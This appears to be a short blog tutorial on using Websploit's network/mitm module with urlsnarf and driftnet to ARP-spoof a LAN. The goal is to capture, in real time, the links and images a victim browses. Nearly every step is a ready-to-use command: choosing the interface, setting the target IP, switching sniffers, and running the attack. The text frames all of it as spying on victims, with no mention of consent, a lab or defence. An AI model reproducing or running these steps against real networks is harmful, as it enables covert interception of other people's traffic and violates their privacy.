Link sniffing with Websploit and Dirftnet.
Link sniffing with Websploit and Dirftnet.
Man In The Middle Attack
The Middle Attak is used to capture all the images and links that is travelling across our Target network.
Anybody who is connected to our network whatever images and links they see in their browser,we will capture and view them in real time.So in this article we will learn how you can spy on Lan network by sniffing images and links that our victim browses.
We will use Driftnet and Websploit to perform this attack.
So open your terminal and start websploit:
root@seven:~# websploit
See all the exploits inside websploit.Below command displays all the exploits with short description.
We will use network man in the middle attack.So type the following:
wsf > use network/mitm
Show option command displays the configurations to launch the attack.We need to set our network interface , sniffer and victim's ip address.
wsf:MITM > show options
Set Interface : I am using wired connection so mine is eth0.If you are using wifi then set your interface to wlan0.
wsf:MITM > set interface eth0
Now we need victim's ip address.Scan your network for live hosts with netdiscover or angry ip scanner , or . if you are satisfied with target then set target with the below command:
wsf:MITM > set target
Replace the ip address with your target.
Now set Sniffer to urlsnarf.By default it's driftnet.
wsf:MITM > set sniffer urlsnarf
Everything is good now just type run command and to capture links.So Whatever victim browses you will see in real time.
wsf:MITM > run [*]IP Forwarding ... [*]ARP Spoofing ... [*]Sniffer Starting ...
If you want to capture images then just set your sniffer to driftnet:
If you quit then you will be taken to the main websploit shell.So you have to switch back to network/mitm attack.
wsf > use network/mitm
Now just change your sniffer to driftnet.Driftnet captures images,and you are good to go:
wsf:MITM > set sniffer driftnet
type run command to launch the attack.
wsf:MITM > run
When you enter run a driftnet window will pop up and you can see all the images that your victim browses there in real time.
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